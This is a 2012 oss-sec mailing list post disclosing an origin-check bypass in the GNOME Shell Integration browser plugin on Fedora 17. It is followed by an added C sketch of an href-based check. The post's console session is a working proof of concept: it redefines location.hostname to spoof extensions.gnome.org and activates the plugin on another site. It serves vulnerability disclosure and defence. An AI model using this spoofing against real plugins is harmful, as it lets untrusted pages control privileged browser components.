oss-sec mailing list archives
note on gnome shell extensions
From: Tavis Ormandy <taviso () cmpxchg8b com>
Date: Sun, 9 Sep 2012 00:36:26 +0200
List,

I just installed Fedora 17 on a workstation. While researching how to upgrade gnome 3 to version 2, I noticed it installed a browser extension called "Gnome Shell Integration".

    $ rpm -qf /usr/lib64/mozilla/plugins/libgnome-shell-browser-plugin.so
    gnome-shell-3.4.1-5.fc17.x86_64

The NPPVpluginDescriptionString states "It can be used only by extensions.gnome.org", but I happen to know that is a tricky thing to get right.

    if (!funcs.getproperty (instance, NPVARIANT_TO_OBJECT (document),
                            funcs.getstringidentifier ("location"),
                            &location))
      goto out;

    if (!NPVARIANT_IS_OBJECT (location))
      goto out;

    hostname = get_string_property (instance,
                                    NPVARIANT_TO_OBJECT (location),
                                    "hostname");

    if (g_strcmp0 (hostname, ORIGIN))
      {
        g_debug ("origin does not match, is %s",
                 hostname);

        goto out;
      }

I'm familiar with this topic as I wrote a tool for managing broken but necessary plugins by restricting them to trusted domains.

http://code.google.com/p/nssecurity

As far as I know, browsers only attempt to prevent tampering with document.location.href, anything else can be modified. For example, this works in Chrome, I don't know the syntax for Mozilla:

    location.__defineGetter__("hostname", function () { return "arbitrary"; })
    undefined
    location.hostname
    "arbitrary"

However,

    location.__defineGetter__("href", function () { return "arbitrary"; })
    undefined
    location.href
    "http://realurl.test/asdasd"

So this should fail:

    o = document.createElement('OBJECT')
    <object></object>
    o.setAttribute('TYPE', 'application/x-gnome-shell-integration')
    undefined
    document.body.appendChild(o)
    <object type="application/x-gnome-shell-integration"></object>
    o.shellVersion
    undefined

But we can re-insert it and make it work:

    document.body.removeChild(o)
    <object type="application/x-gnome-shell-integration"></object>
    location.__defineGetter__("hostname", function () { return "extensions.gnome.org"; })
    undefined
    document.body.appendChild(o)
    <object type="application/x-gnome-shell-integration"></object>
    o.shellVersion
    "3.4.1"
    document.location.href
    "https://www.redhat.com/"

The plugin incorrectly trusted hostname, and initialized. As far as I can tell, the plugin will let you install new shell extensions, I don't know what the impact of that is, can they contain native code?

Tavis.

-- 
-------------------------------------
taviso () cmpxchg8b com | pgp encrypted mail preferred
-------------------------------------------------------
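
The following is an added example, not part of the original post and not the gnome-shell project's code. It sketches an origin check built on the location.href string, which the message above reports as the value page script could not override, instead of the script-controllable hostname property. The function name, the https-only policy and the trusted host constant are assumptions made for the illustration.

```c
#include <ctype.h>
#include <stdbool.h>
#include <string.h>

/* Assumed policy for this example: https only, one exact host name. */
#define TRUSTED_SCHEME "https://"
#define TRUSTED_HOST   "extensions.gnome.org"

/* ASCII case-insensitive comparison of the first n bytes. */
static bool
equal_nocase (const char *a, const char *b, size_t n)
{
  for (size_t i = 0; i < n; i++)
    if (tolower ((unsigned char) a[i]) != tolower ((unsigned char) b[i]))
      return false;
  return true;
}

/* Hypothetical helper: true only if the authority of an absolute URL
 * (the value of location.href) is exactly TRUSTED_HOST over https. */
bool
href_is_trusted (const char *href)
{
  size_t scheme_len = strlen (TRUSTED_SCHEME);
  const char *auth, *end, *host, *p;

  if (href == NULL || !equal_nocase (href, TRUSTED_SCHEME, scheme_len))
    return false;

  /* Authority ends at the first '/', '?' or '#'; browsers also treat
   * '\' as '/', so stop there too. */
  auth = href + scheme_len;
  end = auth + strcspn (auth, "/?#\\");

  /* Userinfo is not the host: start after the last '@' in the authority. */
  host = auth;
  for (p = auth; p < end; p++)
    if (*p == '@')
      host = p + 1;

  /* Whole-host match only. An explicit port or a longer name such as
   * extensions.gnome.org.evil.test changes the length and is rejected. */
  if ((size_t) (end - host) != strlen (TRUSTED_HOST))
    return false;
  return equal_nocase (host, TRUSTED_HOST, strlen (TRUSTED_HOST));
}
```

The check is only as strong as the source of the string: it has to be read from a value the page cannot redefine, which is the property the message attributes to href.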